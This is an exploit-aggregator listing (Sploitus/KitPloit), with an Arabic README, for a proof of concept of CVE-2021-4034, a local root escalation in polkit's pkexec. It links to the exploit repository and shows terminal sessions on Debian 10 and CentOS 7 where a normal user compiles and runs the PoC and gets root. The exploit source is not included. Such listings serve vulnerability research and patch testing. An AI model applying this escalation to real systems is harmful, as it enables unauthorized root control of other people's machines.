Sploitus

Exploit for POC

kitploit · 2026-08-27

Exploit Code

MARKDOWN45 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-YAKUMWAMBA-POC-CVE-2021-4034
![polkit-bug](https://assets.kitploit.com/production/public/readmes/51899/af84796d0b2fb088f55c12e0c9bfe102bf5776fe2f8c604c9e7fc10f0ec24ba9/1b6552a1ca647fdcd4b2a899120c73b968030f30c4f9bc5b542660e3ce8eba52-display-v1.webp)

# **CVE-2021-4034**

على الرغم من أن هذه الثغرة الأمنية غير قابلة للاستغلال عن بُعد ولا تسمح بحد ذاتها بتنفيذ تعليمات برمجية عشوائية، إلا أنها يمكن أن يستخدمها المهاجمون الذين تمكنوا بالفعل من الحصول على موطئ قدم على مضيف ضعيف لتصعيد صلاحياتهم وتحقيق تلك القدرة.

https://seclists.org/oss-sec/2022/q1/80https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

# **PoC**

تم التحقق منه على Debian 10 و CentOS 7.

يمكنك العثور على المستودع عبر هذا الرابط ← https://github.com/Yakumwamba/POC-CVE-2021-4034.git

root@kitploit:~
    
    
    user@debian:~$ grep PRETTY /etc/os-release
    PRETTY_NAME="Debian GNU/Linux 10 (buster)"
    user@debian:~$ id
    uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
    user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
    user@debian:~$ ./cve-2021-4034-poc
    # id
    uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user)
    

root@kitploit:~
    
    
    [user@centos ~]$ grep PRETTY /etc/os-release
    PRETTY_NAME="CentOS Linux 7 (Core)"
    [user@centos ~]$ id
    uid=11000(user) gid=11000(user) groups=11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
    [user@centos ~]$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
    [user@centos ~]$ ./cve-2021-4034-poc
    sh-4.2# id
    uid=0(root) gid=0(root) groups=0(root),11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
    sh-4.2# exit
    

## إخلاء مسؤولية - يمكن استخدام هذه الأداة بشكل خبيث

يمكن استخدامها أيضًا لإلحاق الضرر بخوادم Linux غير المحدثة أو تعطيلها. مؤلف هذه الأداة غير مسؤول عن أي أضرار أو خسائر قد تحدث نتيجة استخدامها.